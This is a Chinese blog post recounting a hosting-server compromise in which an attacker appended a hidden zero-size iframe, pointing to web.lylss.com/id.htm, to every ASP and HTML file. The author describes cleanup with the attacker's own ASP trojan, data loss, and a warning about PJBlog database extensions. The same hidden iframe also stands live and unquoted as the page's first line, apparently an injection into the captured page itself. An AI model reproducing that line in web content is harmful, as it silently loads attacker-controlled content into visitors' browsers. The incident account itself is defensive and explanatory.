<iframe src=http://web.lylss.com/id.htm width=0 height=0></iframe>
昨天早上到公司，发现自己的这个网站无法打开，提示出错，后来同事说公司的网站也
打不开，这两个网站是托管在同一台机器上的(浙江电信机房)，到服务器上一查看，所
有的ASP、html结尾的文件，都被加上了这段代码：

程序代码

<iframe src=http://web.lylss.com/id.htm width=0 height=0></iframe>

同时，机房说这个服务器上的好多网站都被挂了。
幸好，这个木马程序我也有，通过木马的清马功能，是可以清除的。
我在清马的过程中发现，我的马也被挂了，看来那家伙，还连在服务器。结果只能关了
网站，一个一个清理。同时，通过日志找到了他的木马。重命名后，修改密码。就用它
的木马清理它挂的马。以其人之道，还治其人之身。清除扫描结束后，一般网站都能正
常恢复。但如果你网站上有大量的iframe ,可能会造成部分程序出错。(像用Fckeditor
的，就会报错。)如果网站数据库是以.asp作为扩展名的，那可就惨了(就像我自己的这
个网站)。网站数据库也会被木马破坏，且无法清除。(反正，用那个ASP木马清除不了，
我也用工具修复过，但还是打不开，有高手能还原的请指教一下)本来以.asp作为扩展名，
防下载的，没想到，结果数据都没有了。
幸好前几天备份了一回，只丢失一周的数据。
用PJBlog作博客的朋友注意了，数据库最好不要用默认的.asp作为扩展名！！